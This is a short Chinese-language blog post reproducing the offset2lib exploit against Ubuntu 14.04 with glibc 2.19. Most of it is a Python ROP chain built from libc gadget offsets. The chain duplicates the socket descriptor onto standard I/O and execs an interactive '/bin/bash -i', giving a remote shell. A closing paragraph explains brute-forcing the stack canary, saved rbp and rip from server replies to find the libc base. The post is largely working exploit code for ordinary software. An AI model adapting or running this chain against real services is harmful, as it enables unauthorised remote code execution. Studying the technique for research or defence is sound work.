zerons's Blog

For The Dream

offset2lib glibc2-19 测试

zerons posted @ 2015年4月07日 14:47 in sec , 584 阅读

ref http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html

 

环境 ubuntu14.04.2 glibc-2.19 kernel 3.18.9

 

.py文件需要修改成对应于glibc-2.19的版本

off = libc_base

# dup2 to the three standard I/O FD (STDIN, STDOUT, STDERR)
# dup2(4,0)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x0)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) #  execve #dup2 33
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,1)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x1)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) #  execve #dup2 33
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,2)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x2)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) #  execve #dup2 33
p += pack('Q', off) #padding
p += pack('Q', off) #padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret


p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "/bin/bas" # /bin/bas
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf088) # @ .data + 8
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "hAAAAAAA" # hAAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf089) # @ .data + 9
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ;ret 

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "-iAAAAAA" # -iAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08c) # @ .data + 12
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf095) # @ .data + 21
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data

p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13

p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29

p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x000000000000003b) #  execve
p += pack("Q", off) #padding
p += pack("Q", off) #padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

代码通过不断的比较服务程序返回的值来依次测试偏移量, canary, rbp, rip, 由rip可得到对应的程序加载基址, 从而可得到libc的加载基址, 通过相应指令在libc中的偏移来复制文件描述符 执行bash程序.


登录 *


loading captcha image...
(输入验证码)
or Ctrl+Enter